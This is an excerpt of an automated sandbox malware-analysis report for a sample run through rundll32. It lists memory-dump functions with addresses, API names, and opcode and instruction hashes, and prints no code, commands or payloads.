                                                                    • Opcode Fuzzy Hash: c77ee9db95c24773db9081a7deccb5cf2f36f3081fec3039551d8f54b381666b
                                                                    • Instruction Fuzzy Hash: 2972B334B60A065FFB599B2A9C91FE933D6FB8C380F844474A84AC72C6DE34EC419659
                                                                    Function 000001CEAFC855C0 Relevance: .9, Instructions: 926COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 350242b65a825236f0cef7dba7e89bea0ee836d7790e07bd0f8663bca9a95aae
                                                                    • Instruction ID: 5dbc976e77adda638d7a200b7e01795c21c1e5bab7433391d6523618e2aff616
                                                                    • Opcode Fuzzy Hash: 350242b65a825236f0cef7dba7e89bea0ee836d7790e07bd0f8663bca9a95aae
                                                                    • Instruction Fuzzy Hash: 4B727130158B088FE7A4EF19D885BDAB7E1FB98344F21466DD44DC72A6CB34E845CB86
                                                                    Function 000001CEAFC92BB0 Relevance: .8, Instructions: 821COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: aff5c4d20f6982611215f9d6a88c3eb7a971e3ecba982710c61e21332a3c11f9
                                                                    • Instruction ID: 5424bacf1d8f4a3963eeb9486640b34dca0ac75364863194d1d8b689baaf2864
                                                                    • Opcode Fuzzy Hash: aff5c4d20f6982611215f9d6a88c3eb7a971e3ecba982710c61e21332a3c11f9
                                                                    • Instruction Fuzzy Hash: E652B530368B045FF768BB199862BEEB3D6FBC8740F50451DA48AC32D2DA35E945C687
                                                                    Function 000001CEAFCA2F60 Relevance: .6, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6a83add80c015651db2210a2c8c18f03a1d4ada41add862ec9d8abcd3fa1614
                                                                    • Instruction ID: a96ebd2c6fcefc073b7ab55e6a55183f66356902eaeb64ee3512868eab053fb2
                                                                    • Opcode Fuzzy Hash: d6a83add80c015651db2210a2c8c18f03a1d4ada41add862ec9d8abcd3fa1614
                                                                    • Instruction Fuzzy Hash: 1C223830218B489FF7A4EB19C465BDEB7E2FB98344F504A1DA08AC32D1DB75E544CB46
                                                                    Function 000001CEAFCA2812 Relevance: .6, Instructions: 559COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85d6e6732e53faa95cd3743e2378d3a887562cd9e05599d55a6b56c32021c76b
                                                                    • Instruction ID: 74f244cf740371f9c7b073bb44efcb2390a8e96fb8b7ee22988a137f3f26578f
                                                                    • Opcode Fuzzy Hash: 85d6e6732e53faa95cd3743e2378d3a887562cd9e05599d55a6b56c32021c76b
                                                                    • Instruction Fuzzy Hash: CD120B30218B489FF7A4EB29C895BDEB7E1FB98345F504A1DA08EC3291DB34D545CB46
                                                                    Function 000001CEAFC9FBC0 Relevance: .5, Instructions: 543COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: faae51807ddb49513d4786620cdd6c550b09a0d8d4213f58ccc1b562f963a966
                                                                    • Instruction ID: 99427f00c675fc39b00706e2cf8b95ef5a019291b6942b0106d302dc345bb703
                                                                    • Opcode Fuzzy Hash: faae51807ddb49513d4786620cdd6c550b09a0d8d4213f58ccc1b562f963a966
                                                                    • Instruction Fuzzy Hash: 75025430668B085FF758EB19D866BDEB7D2FB88384F50452DA08AC32D2DF74D9418687
                                                                    Function 000001CEAFCA1F40 Relevance: .5, Instructions: 514COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4d75c8bae3dadf60b14d49d2fca757bc88afd426212f50ca8b4ad8a0d68515d
                                                                    • Instruction ID: a3fe3d444e3a3a305b370cc7175dfa4851c006c745d3c0105385aa29d29410fa
                                                                    • Opcode Fuzzy Hash: f4d75c8bae3dadf60b14d49d2fca757bc88afd426212f50ca8b4ad8a0d68515d
                                                                    • Instruction Fuzzy Hash: 7D024C30218B489FE764EF29D855BAAB7E2FB88344F50452DA08AC32D1DF34E945CB46
                                                                    Function 000001CEAFC89120 Relevance: .5, Instructions: 494COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93e8d057c5f9894473d845d1c83c9ad02595634ce579fe39b255221776393a4b
                                                                    • Instruction ID: b1bbfdfd36d8cc4a978d369f8e22ced4c5ad376451024f08a53ab5aa3704d323
                                                                    • Opcode Fuzzy Hash: 93e8d057c5f9894473d845d1c83c9ad02595634ce579fe39b255221776393a4b
                                                                    • Instruction Fuzzy Hash: 1D02AC30268B089FF764AF19D455BEEB7E1FB88744F50492DA08AC32D1CB78D945CB86
                                                                    Function 000001CEAFC799D0 Relevance: .5, Instructions: 489COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e900f451b4fb25b4a4ec71e5c06c8d4aca2ec53ba872fd3ee1d632b7d26ca10
                                                                    • Instruction ID: 0d9bcff9f132ce2ab9ee4004cbfc3fae15185cd1538f01ea002e283af2489fbb
                                                                    • Opcode Fuzzy Hash: 6e900f451b4fb25b4a4ec71e5c06c8d4aca2ec53ba872fd3ee1d632b7d26ca10
                                                                    • Instruction Fuzzy Hash: 90F14F30658B489FF764EB29D455BEEB7E1FB88340F504A2DA48AC32D1DF38D8458786
                                                                    Function 000001CEAFCA0210 Relevance: .5, Instructions: 473COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 9aa099fc02c16ba095d4bf4291fdb0dcd3e10970e4b1abe0c916cefc9fc1f856
                                                                    • Instruction ID: fddd45938af736d1f75708f15d643d5f00fdeb40321d711dbc0ba8abefdd13aa
                                                                    • Opcode Fuzzy Hash: 9aa099fc02c16ba095d4bf4291fdb0dcd3e10970e4b1abe0c916cefc9fc1f856
                                                                    • Instruction Fuzzy Hash: C6E16230668B085FF758EB19D856BAEB7D2FBC8384F50451DB08AC32D2DE74D941878A
                                                                    Function 000001CEAFC84DB0 Relevance: .5, Instructions: 471COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67e5cb04a7b8afc38bfdb1fe03543906a8b7734bb26e47d94f1bfbbc31827fd8
                                                                    • Instruction ID: 7ee7470e863dee9be746a8540477c7e6fa120bdb4ef98bbf281498d8a8fef83e
                                                                    • Opcode Fuzzy Hash: 67e5cb04a7b8afc38bfdb1fe03543906a8b7734bb26e47d94f1bfbbc31827fd8
                                                                    • Instruction Fuzzy Hash: BCE18230268B485FF758EB2DC455BEEB7D1FB88384F50496DA08AC32D2DE34E8458786
                                                                    Function 000001CEAFC842A0 Relevance: .4, Instructions: 417COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: b817203ba3c4443f5fb8480b07f75b397d38fcfc8ae896fd7bf819042d688969
                                                                    • Instruction ID: 97a3131f3cd8477f10784a0d39fa2bf685023b4162ea76fb2d849efeb2bd1797
                                                                    • Opcode Fuzzy Hash: b817203ba3c4443f5fb8480b07f75b397d38fcfc8ae896fd7bf819042d688969
                                                                    • Instruction Fuzzy Hash: E0D1763061CB088FF768EF29D855B9AB7E1FB98340F11052DE44AC32A5DB74E945CB86
                                                                    Function 000001CEAFC982A0 Relevance: .4, Instructions: 407COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4237f224364ca09d82fdfaf80bb53fadb4830d28f3244d1edf08e2ee8371bdbc
                                                                    • Instruction ID: f3636896c847f64d0ecea60679e4bba2af127f10e9241c2f04d9c3dc1c3b2f24
                                                                    • Opcode Fuzzy Hash: 4237f224364ca09d82fdfaf80bb53fadb4830d28f3244d1edf08e2ee8371bdbc
                                                                    • Instruction Fuzzy Hash: CDD16D30218B485FF764EB29D855BEEB6D2FB88344F50462DA08EC32D2DF74D9458786
                                                                    Function 000001CEAFC955E0 Relevance: .4, Instructions: 398COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d67f70248d9871493b444570412385d01f8192461fdcfc939c1c5d9bc251a4ce
                                                                    • Instruction ID: 0095dc789b46716101dd21d2512288f2e28e52fbe7cf0911a2822d30f93239bd
                                                                    • Opcode Fuzzy Hash: d67f70248d9871493b444570412385d01f8192461fdcfc939c1c5d9bc251a4ce
                                                                    • Instruction Fuzzy Hash: 6DC15030328B484FF758EB29D466BAEF7D2FB88344F50452DA08AC32D2DB79D9458746
                                                                    Function 000001CEAFC8BED0 Relevance: .3, Instructions: 333COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2428df4c2b5cda2abb3800129e89791470056923b1d70c4f1012cb95f183359f
                                                                    • Instruction ID: 25c754acdf3b72a342e551b51f5529c04b3e83581d8e05deffd46b8b4d2e9915
                                                                    • Opcode Fuzzy Hash: 2428df4c2b5cda2abb3800129e89791470056923b1d70c4f1012cb95f183359f
                                                                    • Instruction Fuzzy Hash: A3B10C70628B488FE7A8EF1DD459B9AB7E1FB99344F50452DA08EC3291CB34D8458B46
                                                                    Function 00007FF8A8D05320 Relevance: .3, Instructions: 304COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeallocateProcessstd::_$CurrentInit_thread_footerTimesstd::invalid_argument::invalid_argument
                                                                    • String ID:
                                                                    • API String ID: 2931547792-0
                                                                    • Opcode ID: 35fd540647e9ab6b5c5af79c3890bb00567cf1995cf5ab655b5ad1e370cb5ff9
                                                                    • Instruction ID: f97fc17d90147405db273d4a89b83bc134d27c4a01291b853a0ef081e5b800ca
                                                                    • Opcode Fuzzy Hash: 35fd540647e9ab6b5c5af79c3890bb00567cf1995cf5ab655b5ad1e370cb5ff9
                                                                    • Instruction Fuzzy Hash: 8AD13672B06B06AAEB14DB64E4501EC3376FB48788B404536EE4E57B58EF3CD219C758
                                                                    Function 000001CEAFC7A730 Relevance: .3, Instructions: 275COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92dcddac20bf2a85382346e7c818b7a8622ac2cf6c43a00e52d6e282357d0b4a
                                                                    • Instruction ID: 5ccec3a933f4477f3bff263bf8337f2d30810f70192dcb4cdc1807c052b68d40
                                                                    • Opcode Fuzzy Hash: 92dcddac20bf2a85382346e7c818b7a8622ac2cf6c43a00e52d6e282357d0b4a
                                                                    • Instruction Fuzzy Hash: 7B81D43061C6488FF759DF1DD889BAAB7E1FB98744F10462DE48AC32E1DB70D8018786
                                                                    Function 00007FF8A8D41E90 Relevance: .2, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0402643845607bb60e6e3039bc907c849d41a449b6bebdaf36c0de0ce65c9838
                                                                    • Instruction ID: 021a4e8c9f311b664d250f45211b7a1e89dd299fbf7dce2736e958c08a0d6404
                                                                    • Opcode Fuzzy Hash: 0402643845607bb60e6e3039bc907c849d41a449b6bebdaf36c0de0ce65c9838
                                                                    • Instruction Fuzzy Hash: DE8194A4B6A34E53ECED057D290F13C81A7DB827C0EA4D036CD6D17BE9DE1C36089629
                                                                    Function 00007FF8A8D250F8 Relevance: .2, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a07fb626e085332546d45eb85ec56ea865a4a4cf460ba70e7ccd98f8023d075b
                                                                    • Instruction ID: b88839fe23b278e03ff549796cf06584b4896b36def47e46623429a9e742490d
                                                                    • Opcode Fuzzy Hash: a07fb626e085332546d45eb85ec56ea865a4a4cf460ba70e7ccd98f8023d075b
                                                                    • Instruction Fuzzy Hash: AF51DC72F26A9595EB50CBA998418BC2370FB187C4F118A35CE2D67B88EF3CE645C254
                                                                    Function 000001CEAFC8A100 Relevance: .2, Instructions: 157COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9eb25984bbb84b506b7442a44f1ea2276f7130761b53bd599e6125853a15f57f
                                                                    • Instruction ID: 17b7f4e55ed803db92c04403a7e1809754ca34339932872c8e4ac4bcb4763ddc
                                                                    • Opcode Fuzzy Hash: 9eb25984bbb84b506b7442a44f1ea2276f7130761b53bd599e6125853a15f57f
                                                                    • Instruction Fuzzy Hash: AA4145301D8288BDF3684B1E8846BF93BC5E757B85F26522DC5D7832E2D931C80741C9
                                                                    Function 00007FF8A8D1D698 Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77c53f9c0189d6db76991bf2270a20501a0aee0ab20d4b3756397774943919d7
                                                                    • Instruction ID: 87871d6e1964c10a927f7c54f2cbfc90a48aa95a556f9c89372d4cafb9ba2e92
                                                                    • Opcode Fuzzy Hash: 77c53f9c0189d6db76991bf2270a20501a0aee0ab20d4b3756397774943919d7
                                                                    • Instruction Fuzzy Hash: 6E51DF22B15A85A5EB14EF2AE8403A92361FB04BECF405131EE2D47BD8DF78E519C314
                                                                    Function 00007FF8A8DD9AF0 Relevance: .1, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                                    • Instruction ID: a18242ce69d1a9a33c84c742184561817a1eb66cc0c3ea8988a7d754b342e544
                                                                    • Opcode Fuzzy Hash: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                                    • Instruction Fuzzy Hash: 0741B492C4B65A74E955891C05507B426C0EF527E0E5A52B0DDBA137C7EF0F258FCA24
                                                                    Function 00007FF8A8DDC638 Relevance: .1, Instructions: 126COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: b75192fa0f3ac0127e2cb4a1fa065b2cdd8e19476872e7b6502ccbef9d719f65
                                                                    • Instruction ID: 80df244b8c16cbf6ed1ab259cc097daf406191168cd9f25d86edb3293f583298
                                                                    • Opcode Fuzzy Hash: b75192fa0f3ac0127e2cb4a1fa065b2cdd8e19476872e7b6502ccbef9d719f65
                                                                    • Instruction Fuzzy Hash: 4741EE3271AA5992EF04CF6AD9141A9B3A1FB48FD4F099432EE1D87B58DF7CD4068708
                                                                    Function 00007FF8A8DD8554 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
